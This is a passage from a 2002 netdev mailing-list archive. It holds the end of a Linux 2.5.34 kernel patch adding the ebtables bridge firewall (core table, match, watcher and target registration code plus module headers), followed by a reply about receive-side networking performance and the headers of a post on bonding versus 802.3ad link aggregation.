ret; + if (!list_named_insert(&ebt_targets, target)) { + up(&ebt_mutex); + return -EEXIST; + } + up(&ebt_mutex); + MOD_INC_USE_COUNT; + + return 0; +} + 
+void ebt_unregister_target(struct ebt_target *target) +{ + down(&ebt_mutex); + LIST_DELETE(&ebt_targets, target); + up(&ebt_mutex); + MOD_DEC_USE_COUNT; +} + +int ebt_register_match(struct ebt_match *match) +{ + int ret; + + ret = down_interruptible(&ebt_mutex); + if (ret != 0) + return ret; + if (!list_named_insert(&ebt_matches, match)) { + up(&ebt_mutex); + return -EEXIST; + } + up(&ebt_mutex); + MOD_INC_USE_COUNT; + + return 0; +} + +void ebt_unregister_match(struct ebt_match *match) +{ + down(&ebt_mutex); + LIST_DELETE(&ebt_matches, match); + up(&ebt_mutex); + MOD_DEC_USE_COUNT; +} + +int ebt_register_watcher(struct ebt_watcher *watcher) +{ + int ret; + + ret = down_interruptible(&ebt_mutex); + if (ret != 0) + return ret; + if (!list_named_insert(&ebt_watchers, watcher)) { + up(&ebt_mutex); + return -EEXIST; + } + up(&ebt_mutex); + MOD_INC_USE_COUNT; + + return 0; +} + +void ebt_unregister_watcher(struct ebt_watcher *watcher) +{ + down(&ebt_mutex); + LIST_DELETE(&ebt_watchers, watcher); + up(&ebt_mutex); + MOD_DEC_USE_COUNT; +} + +int ebt_register_table(struct ebt_table *table) +{ + struct ebt_table_info *newinfo; + int ret, i, countersize; + + if (!table || !table->table ||!table->table->entries || + table->table->entries_size == 0 || + table->table->counters || table->private) { + BUGPRINT("Bad table data for ebt_register_table!!!\n"); + return -EINVAL; + } + + countersize = COUNTER_OFFSET(table->table->nentries) * NR_CPUS; + newinfo = (struct ebt_table_info *) + vmalloc(sizeof(struct ebt_table_info) + countersize); + ret = -ENOMEM; + if (!newinfo) + return -ENOMEM; + + newinfo->entries = (char *)vmalloc(table->table->entries_size); + if (!(newinfo->entries)) + goto free_newinfo; + + memcpy(newinfo->entries, table->table->entries, + table->table->entries_size); + + if (countersize) + memset(newinfo->counters, 0, countersize); + + // fill in newinfo and parse the entries + newinfo->chainstack = NULL; + ret = translate_table(table->table, newinfo); + if (ret 
!= 0) { + BUGPRINT("Translate_table failed\n"); + goto free_chainstack; + } + + if (table->check && table->check(newinfo, table->valid_hooks)) { + BUGPRINT("The table doesn't like its own initial data, lol\n"); + return -EINVAL; + } + + table->private = newinfo; + table->lock = RW_LOCK_UNLOCKED; + ret = down_interruptible(&ebt_mutex); + if (ret != 0) + goto free_chainstack; + + if (list_named_find(&ebt_tables, table->name)) { + ret = -EEXIST; + BUGPRINT("Table name already exists\n"); + goto free_unlock; + } + + list_prepend(&ebt_tables, table); + up(&ebt_mutex); + MOD_INC_USE_COUNT; + return 0; +free_unlock: + up(&ebt_mutex); +free_chainstack: + if (newinfo->chainstack) { + for (i = 0; i < NR_CPUS; i++) + vfree(newinfo->chainstack[i]); + vfree(newinfo->chainstack); + } + vfree(newinfo->entries); +free_newinfo: + vfree(newinfo); + return ret; +} + +void ebt_unregister_table(struct ebt_table *table) +{ + int i; + + if (!table) { + BUGPRINT("Request to unregister NULL table!!!\n"); + return; + } + down(&ebt_mutex); + LIST_DELETE(&ebt_tables, table); + up(&ebt_mutex); + EBT_ENTRY_ITERATE(table->private->entries, + table->private->entries_size, ebt_cleanup_entry, NULL); + if (table->private->entries) + vfree(table->private->entries); + if (table->private->chainstack) { + for (i = 0; i < NR_CPUS; i++) + vfree(table->private->chainstack[i]); + vfree(table->private->chainstack); + } + vfree(table->private); + MOD_DEC_USE_COUNT; +} + +// userspace just supplied us with counters +static int update_counters(void *user, unsigned int len) +{ + int i, ret; + struct ebt_counter *tmp; + struct ebt_replace hlp; + struct ebt_table *t; + + if (copy_from_user(&hlp, user, sizeof(hlp))) + return -EFAULT; + + if (len != sizeof(hlp) + hlp.num_counters * sizeof(struct ebt_counter)) + return -EINVAL; + if (hlp.num_counters == 0) + return -EINVAL; + + if ( !(tmp = (struct ebt_counter *) + vmalloc(hlp.num_counters * sizeof(struct ebt_counter))) ){ + MEMPRINT("Update_counters && nomemory\n"); 
+ return -ENOMEM; + } + + t = find_table_lock(hlp.name, &ret, &ebt_mutex); + if (!t) + goto free_tmp; + + if (hlp.num_counters != t->private->nentries) { + BUGPRINT("Wrong nr of counters\n"); + ret = -EINVAL; + goto unlock_mutex; + } + + if ( copy_from_user(tmp, hlp.counters, + hlp.num_counters * sizeof(struct ebt_counter)) ) { + BUGPRINT("Update_counters && !cfu\n"); + ret = -EFAULT; + goto unlock_mutex; + } + + // we want an atomic add of the counters + write_lock_bh(&t->lock); + + // we add to the counters of the first cpu + for (i = 0; i < hlp.num_counters; i++) + t->private->counters[i].pcnt += tmp[i].pcnt; + + write_unlock_bh(&t->lock); + ret = 0; +unlock_mutex: + up(&ebt_mutex); +free_tmp: + vfree(tmp); + return ret; +} + +static inline int ebt_make_matchname(struct ebt_entry_match *m, + char *base, char *ubase) +{ + char *hlp = ubase - base + (char *)m; + if (copy_to_user(hlp, m->u.match->name, EBT_FUNCTION_MAXNAMELEN)) + return -EFAULT; + return 0; +} + +static inline int ebt_make_watchername(struct ebt_entry_watcher *w, + char *base, char *ubase) +{ + char *hlp = ubase - base + (char *)w; + if (copy_to_user(hlp , w->u.watcher->name, EBT_FUNCTION_MAXNAMELEN)) + return -EFAULT; + return 0; +} + +static inline int ebt_make_names(struct ebt_entry *e, char *base, char *ubase) +{ + int ret; + char *hlp; + struct ebt_entry_target *t; + + if ((e->bitmask & EBT_ENTRY_OR_ENTRIES) == 0) + return 0; + + hlp = ubase - base + (char *)e + e->target_offset; + t = (struct ebt_entry_target *)(((char *)e) + e->target_offset); + + ret = EBT_MATCH_ITERATE(e, ebt_make_matchname, base, ubase); + if (ret != 0) + return ret; + ret = EBT_WATCHER_ITERATE(e, ebt_make_watchername, base, ubase); + if (ret != 0) + return ret; + if (copy_to_user(hlp, t->u.target->name, EBT_FUNCTION_MAXNAMELEN)) + return -EFAULT; + return 0; +} + +// called with ebt_mutex down +static int copy_everything_to_user(struct ebt_table *t, void *user, + int *len, int cmd) +{ + struct ebt_replace tmp; + struct 
ebt_counter *counterstmp, *oldcounters; + unsigned int entries_size, nentries; + char *entries; + + if (cmd == EBT_SO_GET_ENTRIES) { + entries_size = t->private->entries_size; + nentries = t->private->nentries; + entries = t->private->entries; + oldcounters = t->private->counters; + } else { + entries_size = t->table->entries_size; + nentries = t->table->nentries; + entries = t->table->entries; + oldcounters = t->table->counters; + } + + if (copy_from_user(&tmp, user, sizeof(tmp))) { + BUGPRINT("Cfu didn't work\n"); + return -EFAULT; + } + + if (*len != sizeof(struct ebt_replace) + entries_size + + (tmp.num_counters? nentries * sizeof(struct ebt_counter): 0)) { + BUGPRINT("Wrong size\n"); + return -EINVAL; + } + + if (tmp.nentries != nentries) { + BUGPRINT("Nentries wrong\n"); + return -EINVAL; + } + + if (tmp.entries_size != entries_size) { + BUGPRINT("Wrong size\n"); + return -EINVAL; + } + + // userspace might not need the counters + if (tmp.num_counters) { + if (tmp.num_counters != nentries) { + BUGPRINT("Num_counters wrong\n"); + return -EINVAL; + } + counterstmp = (struct ebt_counter *) + vmalloc(nentries * sizeof(struct ebt_counter)); + if (!counterstmp) { + MEMPRINT("Couldn't copy counters, out of memory\n"); + return -ENOMEM; + } + write_lock_bh(&t->lock); + get_counters(oldcounters, counterstmp, nentries); + write_unlock_bh(&t->lock); + + if (copy_to_user(tmp.counters, counterstmp, + nentries * sizeof(struct ebt_counter))) { + BUGPRINT("Couldn't copy counters to userspace\n"); + vfree(counterstmp); + return -EFAULT; + } + vfree(counterstmp); + } + + if (copy_to_user(tmp.entries, entries, entries_size)) { + BUGPRINT("Couldn't copy entries to userspace\n"); + return -EFAULT; + } + // set the match/watcher/target names right + return EBT_ENTRY_ITERATE(entries, entries_size, + ebt_make_names, entries, tmp.entries); +} + +static int do_ebt_set_ctl(struct sock *sk, + int cmd, void *user, unsigned int len) +{ + int ret; + + switch(cmd) { + case 
EBT_SO_SET_ENTRIES: + ret = do_replace(user, len); + break; + case EBT_SO_SET_COUNTERS: + ret = update_counters(user, len); + break; + default: + ret = -EINVAL; + } + return ret; +} + +static int do_ebt_get_ctl(struct sock *sk, int cmd, void *user, int *len) +{ + int ret; + struct ebt_replace tmp; + struct ebt_table *t; + + if (copy_from_user(&tmp, user, sizeof(tmp))) + return -EFAULT; + + t = find_table_lock(tmp.name, &ret, &ebt_mutex); + if (!t) + return ret; + + switch(cmd) { + case EBT_SO_GET_INFO: + case EBT_SO_GET_INIT_INFO: + if (*len != sizeof(struct ebt_replace)){ + ret = -EINVAL; + up(&ebt_mutex); + break; + } + if (cmd == EBT_SO_GET_INFO) { + tmp.nentries = t->private->nentries; + tmp.entries_size = t->private->entries_size; + tmp.valid_hooks = t->valid_hooks; + } else { + tmp.nentries = t->table->nentries; + tmp.entries_size = t->table->entries_size; + tmp.valid_hooks = t->table->valid_hooks; + } + up(&ebt_mutex); + if (copy_to_user(user, &tmp, *len) != 0){ + BUGPRINT("c2u Didn't work\n"); + ret = -EFAULT; + break; + } + ret = 0; + break; + + case EBT_SO_GET_ENTRIES: + case EBT_SO_GET_INIT_ENTRIES: + ret = copy_everything_to_user(t, user, len, cmd); + up(&ebt_mutex); + break; + + default: + up(&ebt_mutex); + ret = -EINVAL; + } + + return ret; +} + +static struct nf_sockopt_ops ebt_sockopts = +{ { NULL, NULL }, PF_INET, EBT_BASE_CTL, EBT_SO_SET_MAX + 1, do_ebt_set_ctl, + EBT_BASE_CTL, EBT_SO_GET_MAX + 1, do_ebt_get_ctl, 0, NULL +}; + +static int __init init(void) +{ + int ret; + + down(&ebt_mutex); + list_named_insert(&ebt_targets, &ebt_standard_target); + up(&ebt_mutex); + if ((ret = nf_register_sockopt(&ebt_sockopts)) < 0) + return ret; + + printk("Ebtables v2.0 registered"); + return 0; +} + +static void __exit fini(void) +{ + nf_unregister_sockopt(&ebt_sockopts); + printk("Ebtables v2.0 unregistered"); +} + +EXPORT_SYMBOL(ebt_register_table); +EXPORT_SYMBOL(ebt_unregister_table); +EXPORT_SYMBOL(ebt_register_match); 
+EXPORT_SYMBOL(ebt_unregister_match); +EXPORT_SYMBOL(ebt_register_watcher); +EXPORT_SYMBOL(ebt_unregister_watcher); +EXPORT_SYMBOL(ebt_register_target); +EXPORT_SYMBOL(ebt_unregister_target); +EXPORT_SYMBOL(ebt_do_table); +module_init(init); +module_exit(fini); +MODULE_LICENSE("GPL"); --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebtables.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,358 @@ +/* + * ebtables + * + * Authors: + * Bart De Schuymer + * + * ebtables.c,v 2.0, April, 2002 + * + * This code is stongly inspired on the iptables code which is + * Copyright (C) 1999 Paul `Rusty' Russell & Michael J. Neuling + */ + +#ifndef __LINUX_BRIDGE_EFF_H +#define __LINUX_BRIDGE_EFF_H +#include +#include +#include + +#define EBT_TABLE_MAXNAMELEN 32 +#define EBT_CHAIN_MAXNAMELEN EBT_TABLE_MAXNAMELEN +#define EBT_FUNCTION_MAXNAMELEN EBT_TABLE_MAXNAMELEN + +// [gs]etsockopt numbers +#define EBT_BASE_CTL 128 + +#define EBT_SO_SET_ENTRIES (EBT_BASE_CTL) +#define EBT_SO_SET_COUNTERS (EBT_SO_SET_ENTRIES+1) +#define EBT_SO_SET_MAX (EBT_SO_SET_COUNTERS+1) + +#define EBT_SO_GET_INFO (EBT_BASE_CTL) +#define EBT_SO_GET_ENTRIES (EBT_SO_GET_INFO+1) +#define EBT_SO_GET_INIT_INFO (EBT_SO_GET_ENTRIES+1) +#define EBT_SO_GET_INIT_ENTRIES (EBT_SO_GET_INIT_INFO+1) +#define EBT_SO_GET_MAX (EBT_SO_GET_INIT_ENTRIES+1) + +// verdicts >0 are "branches" +#define EBT_ACCEPT -1 +#define EBT_DROP -2 +#define EBT_CONTINUE -3 +#define EBT_RETURN -4 +#define NUM_STANDARD_TARGETS 4 + +// return values for match() functions +#define EBT_MATCH 0 +#define EBT_NOMATCH 1 + +struct ebt_counter +{ + uint64_t pcnt; +}; + +struct ebt_entries { + // this field is always set to zero + // See EBT_ENTRY_OR_ENTRIES. 
+ // Must be same size as ebt_entry.bitmask + unsigned int distinguisher; + // the chain name + char name[EBT_CHAIN_MAXNAMELEN]; + // counter offset for this chain + unsigned int counter_offset; + // one standard (accept, drop, return) per hook + int policy; + // nr. of entries + unsigned int nentries; + // entry list + char data[0]; +}; + +// used for the bitmask of struct ebt_entry + +// This is a hack to make a difference between an ebt_entry struct and an +// ebt_entries struct when traversing the entries from start to end. +// Using this simplifies the code alot, while still being able to use +// ebt_entries. +// Contrary, iptables doesn't use something like ebt_entries and therefore uses +// different techniques for naming the policy and such. So, iptables doesn't +// need a hack like this. +#define EBT_ENTRY_OR_ENTRIES 0x01 +// these are the normal masks +#define EBT_NOPROTO 0x02 +#define EBT_802_3 0x04 +#define EBT_SOURCEMAC 0x08 +#define EBT_DESTMAC 0x10 +#define EBT_F_MASK (EBT_NOPROTO | EBT_802_3 | EBT_SOURCEMAC | EBT_DESTMAC \ + | EBT_ENTRY_OR_ENTRIES) + +#define EBT_IPROTO 0x01 +#define EBT_IIN 0x02 +#define EBT_IOUT 0x04 +#define EBT_ISOURCE 0x8 +#define EBT_IDEST 0x10 +#define EBT_ILOGICALIN 0x20 +#define EBT_ILOGICALOUT 0x40 +#define EBT_INV_MASK (EBT_IPROTO | EBT_IIN | EBT_IOUT | EBT_ILOGICALIN \ + | EBT_ILOGICALOUT | EBT_ISOURCE | EBT_IDEST) + +struct ebt_entry_match +{ + union { + char name[EBT_FUNCTION_MAXNAMELEN]; + struct ebt_match *match; + } u; + // size of data + unsigned int match_size; + unsigned char data[0]; +}; + +struct ebt_entry_watcher +{ + union { + char name[EBT_FUNCTION_MAXNAMELEN]; + struct ebt_watcher *watcher; + } u; + // size of data + unsigned int watcher_size; + unsigned char data[0]; +}; + +struct ebt_entry_target +{ + union { + char name[EBT_FUNCTION_MAXNAMELEN]; + struct ebt_target *target; + } u; + // size of data + unsigned int target_size; + unsigned char data[0]; +}; + +#define EBT_STANDARD_TARGET "standard" +struct 
ebt_standard_target +{ + struct ebt_entry_target target; + int verdict; +}; + +// one entry +struct ebt_entry { + // this needs to be the first field + unsigned int bitmask; + unsigned int invflags; + uint16_t ethproto; + // the physical in-dev + char in[IFNAMSIZ]; + // the logical in-dev + char logical_in[IFNAMSIZ]; + // the physical out-dev + char out[IFNAMSIZ]; + // the logical out-dev + char logical_out[IFNAMSIZ]; + unsigned char sourcemac[ETH_ALEN]; + unsigned char sourcemsk[ETH_ALEN]; + unsigned char destmac[ETH_ALEN]; + unsigned char destmsk[ETH_ALEN]; + // sizeof ebt_entry + matches + unsigned int watchers_offset; + // sizeof ebt_entry + matches + watchers + unsigned int target_offset; + // sizeof ebt_entry + matches + watchers + target + unsigned int next_offset; + unsigned char elems[0]; +}; + +struct ebt_replace +{ + char name[EBT_TABLE_MAXNAMELEN]; + unsigned int valid_hooks; + // nr of rules in the table + unsigned int nentries; + // total size of the entries + unsigned int entries_size; + // start of the chains + struct ebt_entries *hook_entry[NF_BR_NUMHOOKS]; + // nr of counters userspace expects back + unsigned int num_counters; + // where the kernel will put the old counters + struct ebt_counter *counters; + char *entries; +}; + +#ifdef __KERNEL__ + +struct ebt_match +{ + struct list_head list; + const char name[EBT_FUNCTION_MAXNAMELEN]; + // 0 == it matches + int (*match)(const struct sk_buff *skb, const struct net_device *in, + const struct net_device *out, const void *matchdata, + unsigned int datalen); + // 0 == let it in + int (*check)(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *matchdata, unsigned int datalen); + void (*destroy)(void *matchdata, unsigned int datalen); + struct module *me; +}; + +struct ebt_watcher +{ + struct list_head list; + const char name[EBT_FUNCTION_MAXNAMELEN]; + void (*watcher)(const struct sk_buff *skb, const struct net_device *in, + const struct net_device *out, const void 
*watcherdata, + unsigned int datalen); + // 0 == let it in + int (*check)(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *watcherdata, unsigned int datalen); + void (*destroy)(void *watcherdata, unsigned int datalen); + struct module *me; +}; + +struct ebt_target +{ + struct list_head list; + const char name[EBT_FUNCTION_MAXNAMELEN]; + // returns one of the standard verdicts + int (*target)(struct sk_buff **pskb, unsigned int hooknr, + const struct net_device *in, const struct net_device *out, + const void *targetdata, unsigned int datalen); + // 0 == let it in + int (*check)(const char *tablename, unsigned int hookmask, + const struct ebt_entry *e, void *targetdata, unsigned int datalen); + void (*destroy)(void *targetdata, unsigned int datalen); + struct module *me; +}; + +// used for jumping from and into user defined chains (udc) +struct ebt_chainstack +{ + struct ebt_entries *chaininfo; // pointer to chain data + struct ebt_entry *e; // pointer to entry data + unsigned int n; // n'th entry +}; + +struct ebt_table_info +{ + // total size of the entries + unsigned int entries_size; + unsigned int nentries; + // pointers to the start of the chains + struct ebt_entries *hook_entry[NF_BR_NUMHOOKS]; + // room to maintain the stack used for jumping from and into udc + struct ebt_chainstack **chainstack; + char *entries; + struct ebt_counter counters[0] ____cacheline_aligned; +}; + +struct ebt_table +{ + struct list_head list; + char name[EBT_TABLE_MAXNAMELEN]; + struct ebt_replace *table; + unsigned int valid_hooks; + rwlock_t lock; + // e.g. could be the table explicitly only allows certain + // matches, targets, ... 
0 == let it in + int (*check)(const struct ebt_table_info *info, + unsigned int valid_hooks); + // the data used by the kernel + struct ebt_table_info *private; +}; + +extern int ebt_register_table(struct ebt_table *table); +extern void ebt_unregister_table(struct ebt_table *table); +extern int ebt_register_match(struct ebt_match *match); +extern void ebt_unregister_match(struct ebt_match *match); +extern int ebt_register_watcher(struct ebt_watcher *watcher); +extern void ebt_unregister_watcher(struct ebt_watcher *watcher); +extern int ebt_register_target(struct ebt_target *target); +extern void ebt_unregister_target(struct ebt_target *target); +extern unsigned int ebt_do_table(unsigned int hook, struct sk_buff **pskb, + const struct net_device *in, const struct net_device *out, + struct ebt_table *table); + + // Used in the kernel match() functions +#define FWINV(bool,invflg) ((bool) ^ !!(info->invflags & invflg)) +// True if the hook mask denotes that the rule is in a base chain, +// used in the check() functions +#define BASE_CHAIN (hookmask & (1 << NF_BR_NUMHOOKS)) +// Clear the bit in the hook mask that tells if the rule is on a base chain +#define CLEAR_BASE_CHAIN_BIT (hookmask &= ~(1 << NF_BR_NUMHOOKS)) +// True if the target is not a standard target +#define INVALID_TARGET (info->target < -NUM_STANDARD_TARGETS || info->target >= 0) + +#endif /* __KERNEL__ */ + +// blatently stolen from ip_tables.h +// fn returns 0 to continue iteration +#define EBT_MATCH_ITERATE(e, fn, args...) 
\ +({ \ + unsigned int __i; \ + int __ret = 0; \ + struct ebt_entry_match *__match; \ + \ + for (__i = sizeof(struct ebt_entry); \ + __i < (e)->watchers_offset; \ + __i += __match->match_size + \ + sizeof(struct ebt_entry_match)) { \ + __match = (void *)(e) + __i; \ + \ + __ret = fn(__match , ## args); \ + if (__ret != 0) \ + break; \ + } \ + if (__ret == 0) { \ + if (__i != (e)->watchers_offset) \ + __ret = -EINVAL; \ + } \ + __ret; \ +}) + +#define EBT_WATCHER_ITERATE(e, fn, args...) \ +({ \ + unsigned int __i; \ + int __ret = 0; \ + struct ebt_entry_watcher *__watcher; \ + \ + for (__i = e->watchers_offset; \ + __i < (e)->target_offset; \ + __i += __watcher->watcher_size + \ + sizeof(struct ebt_entry_watcher)) { \ + __watcher = (void *)(e) + __i; \ + \ + __ret = fn(__watcher , ## args); \ + if (__ret != 0) \ + break; \ + } \ + if (__ret == 0) { \ + if (__i != (e)->target_offset) \ + __ret = -EINVAL; \ + } \ + __ret; \ +}) + +#define EBT_ENTRY_ITERATE(entries, size, fn, args...) \ +({ \ + unsigned int __i; \ + int __ret = 0; \ + struct ebt_entry *__entry; \ + \ + for (__i = 0; __i < (size);) { \ + __entry = (void *)(entries) + __i; \ + __ret = fn(__entry , ## args); \ + if (__ret != 0) \ + break; \ + if (__entry->bitmask != 0) \ + __i += __entry->next_offset; \ + else \ + __i += sizeof(struct ebt_entries); \ + } \ + if (__ret == 0) { \ + if (__i != (size)) \ + __ret = -EINVAL; \ + } \ + __ret; \ +}) + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_arp.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,26 @@ +#ifndef __LINUX_BRIDGE_EBT_ARP_H +#define __LINUX_BRIDGE_EBT_ARP_H + +#define EBT_ARP_OPCODE 0x01 +#define EBT_ARP_HTYPE 0x02 +#define EBT_ARP_PTYPE 0x04 +#define EBT_ARP_SRC_IP 0x08 +#define EBT_ARP_DST_IP 0x10 +#define EBT_ARP_MASK (EBT_ARP_OPCODE | EBT_ARP_HTYPE | EBT_ARP_PTYPE | \ + EBT_ARP_SRC_IP | EBT_ARP_DST_IP) +#define EBT_ARP_MATCH "arp" + +struct ebt_arp_info +{ + uint16_t htype; + uint16_t ptype; + 
uint16_t opcode; + uint32_t saddr; + uint32_t smsk; + uint32_t daddr; + uint32_t dmsk; + uint8_t bitmask; + uint8_t invflags; +}; + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_ip.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,24 @@ +#ifndef __LINUX_BRIDGE_EBT_IP_H +#define __LINUX_BRIDGE_EBT_IP_H + +#define EBT_IP_SOURCE 0x01 +#define EBT_IP_DEST 0x02 +#define EBT_IP_TOS 0x04 +#define EBT_IP_PROTO 0x08 +#define EBT_IP_MASK (EBT_IP_SOURCE | EBT_IP_DEST | EBT_IP_TOS | EBT_IP_PROTO) +#define EBT_IP_MATCH "ip" + +// the same values are used for the invflags +struct ebt_ip_info +{ + uint32_t saddr; + uint32_t daddr; + uint32_t smsk; + uint32_t dmsk; + uint8_t tos; + uint8_t protocol; + uint8_t bitmask; + uint8_t invflags; +}; + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_vlan.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,20 @@ +#ifndef __LINUX_BRIDGE_EBT_VLAN_H +#define __LINUX_BRIDGE_EBT_VLAN_H + +#define EBT_VLAN_ID 0x01 +#define EBT_VLAN_PRIO 0x02 +#define EBT_VLAN_ENCAP 0x04 +#define EBT_VLAN_MASK (EBT_VLAN_ID | EBT_VLAN_PRIO | EBT_VLAN_ENCAP) +#define EBT_VLAN_MATCH "vlan" + +struct ebt_vlan_info { + uint16_t id; /* VLAN ID {1-4095} */ + uint8_t prio; /* VLAN User Priority {0-7} */ + uint16_t encap; /* VLAN Encapsulated frame code {0-65535} */ + uint8_t bitmask; /* Args bitmask bit 1=1 - ID arg, + bit 2=1 User-Priority arg, bit 3=1 encap*/ + uint8_t invflags; /* Inverse bitmask bit 1=1 - inversed ID arg, + bit 2=1 - inversed Pirority arg */ +}; + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_log.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,17 @@ +#ifndef __LINUX_BRIDGE_EBT_LOG_H +#define __LINUX_BRIDGE_EBT_LOG_H + +#define EBT_LOG_IP 0x01 // if the frame is made by ip, log the ip information +#define EBT_LOG_ARP 0x02 +#define EBT_LOG_MASK (EBT_LOG_IP | EBT_LOG_ARP) +#define EBT_LOG_PREFIX_SIZE 30 
+#define EBT_LOG_WATCHER "log" + +struct ebt_log_info +{ + uint8_t loglevel; + uint8_t prefix[EBT_LOG_PREFIX_SIZE]; + uint32_t bitmask; +}; + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_nat.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,13 @@ +#ifndef __LINUX_BRIDGE_EBT_NAT_H +#define __LINUX_BRIDGE_EBT_NAT_H + +struct ebt_nat_info +{ + unsigned char mac[ETH_ALEN]; + // EBT_ACCEPT, EBT_DROP, EBT_CONTINUE or EBT_RETURN + int target; +}; +#define EBT_SNAT_TARGET "snat" +#define EBT_DNAT_TARGET "dnat" + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_redirect.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,11 @@ +#ifndef __LINUX_BRIDGE_EBT_REDIRECT_H +#define __LINUX_BRIDGE_EBT_REDIRECT_H + +struct ebt_redirect_info +{ + // EBT_ACCEPT, EBT_DROP or EBT_CONTINUE or EBT_RETURN + int target; +}; +#define EBT_REDIRECT_TARGET "redirect" + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_mark_m.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,15 @@ +#ifndef __LINUX_BRIDGE_EBT_MARK_M_H +#define __LINUX_BRIDGE_EBT_MARK_M_H + +#define EBT_MARK_AND 0x01 +#define EBT_MARK_OR 0x02 +#define EBT_MARK_MASK (EBT_MARK_AND | EBT_MARK_OR) +struct ebt_mark_m_info +{ + unsigned long mark, mask; + uint8_t invert; + uint8_t bitmask; +}; +#define EBT_MARK_MATCH "mark_m" + +#endif --- /dev/null Thu Aug 24 11:00:32 2000 +++ linux-2.5.34-ebtables/include/linux/netfilter_bridge/ebt_mark_t.h Wed Sep 11 23:06:55 2002 @@ -0,0 +1,12 @@ +#ifndef __LINUX_BRIDGE_EBT_MARK_T_H +#define __LINUX_BRIDGE_EBT_MARK_T_H + +struct ebt_mark_t_info +{ + unsigned long mark; + // EBT_ACCEPT, EBT_DROP or EBT_CONTINUE or EBT_RETURN + int target; +}; +#define EBT_MARK_TARGET "mark" + +#endif From niv@us.ibm.com Thu Sep 12 10:14:15 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 10:14:19 -0700 (PDT) Received: from e2.ny.us.ibm.com (e2.ny.us.ibm.com 
[32.97.182.102]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CHEEtG009324 for ; Thu, 12 Sep 2002 10:14:15 -0700 Received: from northrelay01.pok.ibm.com (northrelay01.pok.ibm.com [9.56.224.149]) by e2.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g8CHIjIV260852; Thu, 12 Sep 2002 13:18:45 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay01.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g8CHIbg2188610; Thu, 12 Sep 2002 13:18:38 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id A08513FE06; Thu, 12 Sep 2002 13:18:38 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id EFBC623C00F; Thu, 12 Sep 2002 13:18:37 -0400 (EDT) Received: from 9.47.18.15 ( [9.47.18.15]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Thu, 12 Sep 2002 10:18:37 -0700 Message-ID: <1031851117.3d80cc6d8c8e0@imap.linux.ibm.com> Date: Thu, 12 Sep 2002 10:18:37 -0700 From: Nivedita Singhvi To: Todd Underwood Cc: "David S. Miller" , "hadi@cyberus.ca" , "tcw@tempest.prismnet.com" , "linux-kernel@vger.kernel.org" , "netdev@oss.sgi.com" Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.47.18.15 X-archive-position: 164 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev

Quoting Todd Underwood :

> sorry for the late reply. catching up on kernel mail.

> the main difference, though, is that general purpose kernel
> development still focussed on the improvements in *sending* speed.
> for real high performance networking, the improvements are necessary
> in *receiving* cpu utilization, in our estimation.
> (see our analysis of interrupt overhead and the effect on receivers
> at gigabit speeds--i hope that this has become common understanding
> by now)

Some of that may be a byproduct of the "all the world's a webserver" mindset - we are primarily focussed on the server side (aka money side ;)), and there is some amount of automatic thinking that this means we're going to be sending data and receiving small packets (mostly acks) in return.

There is much less emphasis given to solving the problems on the other side (active connection scalability for instance), or other issues that manifest themselves as client side bottlenecks for most applications.

thanks,
Nivedita

From borisp@mc.com Thu Sep 12 11:34:46 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 12 Sep 2002 11:34:51 -0700 (PDT) Received: from mc.com (iris.mc.com [192.233.16.119]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8CIYjtG011212 for ; Thu, 12 Sep 2002 11:34:45 -0700 Received: from mc.com by mc.com (8.8.8+Sun/SMI-SVR4) id OAA11652; Thu, 12 Sep 2002 14:39:11 -0400 (EDT) Message-ID: <3D80DF4F.5B218F19@mc.com> Date: Thu, 12 Sep 2002 14:39:11 -0400 From: Boris Protopopov Organization: Mercury Computer Systems, Inc. X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: bonding vs 802.3ad/Cisco EtherChannel link agregation Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 165 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com 